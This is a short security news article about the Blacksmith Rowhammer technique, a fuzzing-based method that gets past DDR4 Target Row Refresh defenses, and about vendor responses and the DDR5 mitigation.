Researchers have identified a new Rowhammer technique, which could allow bypass of existing defenses related to Rowhammer exploits on DRAM memory. Named Blacksmith, this new method allows attackers to target DDR4 memory, resulting in memory corruption and privilege escalation, among others.
What has been discovered?
Researchers from ComSec group have demonstrated that it is possible to trigger the Rowhammer exploit and target the associated DRAMs used in commercially available devices.
Blacksmith (tracked as CVE-2021-42114) is a fuzzing-based technique, and unlike previous DRAM exploits, it works well for non-uniform hammering patterns as well.
The previous hammering methods were based on an approach of uniform hammering patterns of cells inside the RAM to bypass security.
However, Blacksmith gives the same results while exploring the non-uniform structures.
A bit about Rowhammer
Rowhammer is a known vulnerability in the devices operating on DRAM memory. It exploits the leakage of electrical charges of adjacent cells in DRAM memory and allows attackers to induce bit flips (i.e. flip zeros into ones and vice versa).
To mitigate exploitation via Rowhammer, memory manufacturers implemented a method called Target Row Refresh (TRR), which can protect DDR4 from Rowhammer attacks.
However, the latest Blacksmith exploit uses various parameters such as order, regularity, and intensity to design frequency-based Rowhammer patterns.
These were then fed into the Blacksmith fuzzer to find working values, which would allow attackers to target a specific device.
During the experiment, the research team executed the fuzzer for 12 hours, after which it produced an optimal set of values for performing bit flips for a contiguous memory area of 256MB.
To further validate their findings, researchers performed test attacks and were able to retrieve the private encryption keys for an RSA-2048 system, which was used for SSH host authentication.
Possible solution
The latest DDR5 DRAM modules available in the market are thought to be unaffected by Blacksmith.
In DDR5, the TRR is replaced by Refresh Management. This system keeps track of activations in a bank and once a threshold is reached, it issues selective refreshes.
This, in turn, makes it hard to perform scalable fuzzing on DDR DRAM.
Ending notes
The revelations about the Blacksmith exploit were well received by several DRAM manufacturers, including Micron, Samsung, and SK Hynix. Moreover, Microsoft, Intel, Google, Oracle, and AMD confirmed these findings. From an end-user perspective, switching to the latest hardware seems to be the most viable option to protect against this threat.